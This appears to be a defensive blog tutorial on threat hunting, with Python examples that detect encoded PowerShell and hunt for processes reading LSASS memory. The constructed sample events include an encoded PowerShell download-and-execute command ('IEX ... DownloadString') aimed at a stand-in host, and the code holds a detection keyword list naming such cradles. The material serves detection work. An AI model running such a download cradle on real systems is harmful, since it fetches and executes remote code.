Introduction to Threat Hunting: Proactive Security Beyond Alerts

How to proactively search for threats that evade automated detection, including hypothesis-driven hunting methodologies, essential data sources, and practical hunting techniques.

October 20, 2025 | 11 min read
Tags: Threat Hunting, Blue Team, Detection, Security

Automated detection systems, no matter how sophisticated, cannot catch everything. Threat hunting is the practice of proactively searching for threats that have evaded existing defenses. It assumes that adversaries may already be present in the environment and actively looks for evidence of their presence.

Why Hunt?

Detection rules are reactive. They catch threats that match known patterns. But sophisticated adversaries deliberately avoid triggering alerts. They use legitimate tools (living off the land), encrypt their communications, and blend their activity with normal operations.

The average dwell time, the period between initial compromise and detection, exceeds 200 days in many industries. Threat hunting aims to reduce that window by actively searching for signs of compromise rather than waiting for alerts.

Hypothesis-Driven Hunting

Effective threat hunting is not random searching. It begins with a hypothesis: a specific threat behavior you believe might be occurring in your environment.

Building Hypotheses starts with threat intelligence. What TTPs (tactics, techniques, and procedures) are adversaries using against organizations like yours? The MITRE ATT&CK framework provides a structured catalog of adversary behaviors to base hypotheses on.

For example: "Attackers may be using PowerShell to execute encoded commands for defense evasion (T1059.001)." This hypothesis is specific, testable, and based on known adversary behavior.

Testing Hypotheses involves querying available data sources for evidence. For the PowerShell hypothesis, you would search endpoint logs for powershell.exe executions with -EncodedCommand or -e parameters, decode those commands, and analyze whether they represent legitimate administration or suspicious activity.

Outcomes are either evidence of threat activity (escalate to incident response) or confirmation that the hypothesis does not match current activity (document the findings and move to the next hypothesis). Both outcomes provide value.
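Testing the PowerShell hypothesis above against endpoint process-creation events, as an added example (not code from the original article): it matches any of the abbreviated -EncodedCommand flags, decodes the base64-wrapped UTF-16LE script, and sorts each hit for review. The event records, paths and keyword list are constructed for illustration.

```python
import base64
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...); match by prefix.
ENCODED_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)}
# Strings a hunter reviews when they appear in the decoded script.
REVIEW_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "frombase64string")

def find_encoded_arg(cmdline):
    """Return the base64 token following an -EncodedCommand style flag, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and tok[1:].lower() in ENCODED_FLAGS:
            return tokens[i + 1]
    return None

def decode_powershell(b64):
    """PowerShell base64-encodes the UTF-16LE script; malformed input yields None."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def hunt_encoded_powershell(events):
    """Test the hypothesis over process-creation events: decode each hit, then triage it."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        payload = find_encoded_arg(ev["cmdline"])
        if payload is None:
            continue
        decoded = decode_powershell(payload)
        verdict = ("undecodable" if decoded is None
                   else "suspicious" if any(k in decoded.lower() for k in REVIEW_KEYWORDS)
                   else "review")  # decoded cleanly; confirm it is routine administration
        findings.append({"user": ev["user"], "decoded": decoded, "verdict": verdict})
    return findings

def _enc(script):  # builds the constructed sample below the way PowerShell would
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"image": PS, "user": "CORP\\admin1",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _enc("Get-Service -Name Spooler")},
    {"image": PS, "user": "CORP\\jdoe", "cmdline": "powershell.exe -nop -w hidden -e "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"image": r"C:\Windows\System32\cmd.exe", "user": "CORP\\jdoe", "cmdline": "cmd.exe /c whoami"},
]
```

An undecodable payload is itself worth a look: a token that follows the flag but is not valid base64 UTF-16LE is not something PowerShell itself would have produced.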

Essential Data Sources

Threat hunting requires visibility. The richer your data, the more effective your hunts.

Endpoint Telemetry from EDR solutions provides process creation events, command-line arguments, file modifications, registry changes, and network connections. This is the most valuable data source for most hunts.

Network Traffic reveals communication patterns: connections to external IPs, DNS queries, data transfer volumes, and protocol usage. NetFlow data provides summary statistics even when full packet capture is not feasible.

Authentication Logs from Active Directory and identity providers show who is accessing what. Anomalous logon patterns, ticket granting activity, and privilege escalation attempts are visible here.

Cloud Logs from AWS CloudTrail, Azure Activity Logs, and similar services track administrative actions in cloud environments.

Practical Hunting Techniques

Frequency Analysis identifies rare events that might indicate malicious activity. Most users run common applications. A single workstation running a rarely seen executable warrants investigation.

Stacking groups similar events to find outliers. If 99% of PowerShell executions use standard flags and one uses an unusual parameter combination, focus on the outlier.

Baselining establishes what normal looks like for your environment. Once you know normal, deviations become visible. What processes normally run on servers? What external connections do workstations typically make?

TTP-Based Hunting maps to specific MITRE ATT&CK techniques. Choose a technique, understand how adversaries implement it, and search for artifacts that would result from that implementation.

Example Hunt: Credential Dumping

Hypothesis: Attackers may have compromised credentials by accessing LSASS memory (T1003.001).

Data Required: Process creation logs showing access to lsass.exe, specifically processes that open LSASS with memory read access.

Investigation Steps:

1. Query for processes that accessed lsass.exe
2. Filter out known legitimate security tools (AV, EDR agents)
3. Investigate remaining processes: What is the parent process? What user context? What command line?
4. Cross-reference with threat intelligence on known credential dumping tools

Expected Findings: Legitimate access from security tools. Suspicious access from unexpected processes like renamed executables or scripts requires immediate escalation.
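The investigation steps above, combined with the stacking technique from the previous section, as an added example (not the article's own code) run over constructed process-access records: keep events that open lsass.exe with a memory-read access mask, drop allowlisted tools by full path, triage what remains by parent, user and location, and stack source images by host count so rare ones surface. The allowlist, hostnames and event records are constructed for illustration.

```python
PROCESS_VM_READ = 0x0010  # access right a process needs to read another process's memory
LSASS = "\\lsass.exe"

# Constructed allowlist of security tooling expected to open LSASS; maintain it per environment
# and match on the full path so a renamed copy elsewhere is not excused by its file name.
KNOWN_GOOD = {r"c:\program files\windows defender\msmpeng.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")

def lsass_read_events(events):
    """Step 1: keep events whose target is lsass.exe and whose granted mask includes VM_READ."""
    return [e for e in events
            if e["target"].lower().endswith(LSASS) and e["access"] & PROCESS_VM_READ]

def drop_known_good(events):
    """Step 2: remove allowlisted security tools."""
    return [e for e in events if e["source"].lower() not in KNOWN_GOOD]

def triage(events):
    """Step 3: record parent, user and path; flag source images outside standard locations."""
    return [{"host": e["host"], "source": e["source"], "parent": e["parent"], "user": e["user"],
             "unexpected_path": not e["source"].lower().startswith(SYSTEM_DIRS)}
            for e in events]

def stack_by_source(events):
    """Stacking: count distinct hosts per source image; images seen on one host sort first."""
    hosts = {}
    for e in events:
        hosts.setdefault(e["source"].lower(), set()).add(e["host"])
    return sorted((len(h), img) for img, h in hosts.items())

LSASS_PATH = r"C:\Windows\System32\lsass.exe"
DEFENDER = r"C:\Program Files\Windows Defender\MsMpEng.exe"
SAMPLE_ACCESS_EVENTS = [  # constructed process-access records, not real telemetry
    {"host": "WS01", "source": DEFENDER, "parent": r"C:\Windows\System32\services.exe",
     "user": "NT AUTHORITY\\SYSTEM", "target": LSASS_PATH, "access": 0x1FFFFF},
    {"host": "WS02", "source": DEFENDER, "parent": r"C:\Windows\System32\services.exe",
     "user": "NT AUTHORITY\\SYSTEM", "target": LSASS_PATH, "access": 0x1FFFFF},
    {"host": "WS03", "source": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "user": "NT AUTHORITY\\SYSTEM", "target": LSASS_PATH, "access": 0x1000},  # no VM_READ bit
    {"host": "WS03", "source": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "user": "CORP\\jdoe", "target": LSASS_PATH, "access": 0x1010},  # renamed copy outside System32
    {"host": "WS04", "source": r"C:\Windows\System32\wininit.exe", "parent": r"C:\Windows\System32\smss.exe",
     "user": "NT AUTHORITY\\SYSTEM", "target": r"C:\Windows\System32\services.exe", "access": 0x1FFFFF},
]
```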

Building a Hunting Program

Start small. You do not need a dedicated hunting team to begin. Allocate a few hours per week for structured hunting exercises.

Document everything. Hunting produces knowledge even when it does not find threats. Document hypotheses, queries, findings, and false positive patterns. This knowledge compounds over time.

Automate successful hunts. When a hunt identifies a detection gap, work with detection engineering to create automated alerts. The goal is continuous improvement of detection coverage.

Share findings. Hunting insights benefit the broader security community. Contribute to threat intelligence sharing platforms and publish research on novel techniques.

The Hunting Mindset

Effective threat hunters think like adversaries. They understand how attacks unfold, what artifacts they leave behind, and how those artifacts can be distinguished from legitimate activity. This mindset develops through practice, studying real-world incidents, and continuous learning about evolving threats.

Threat hunting is not a tool or a process. It is a skill that improves with deliberate practice.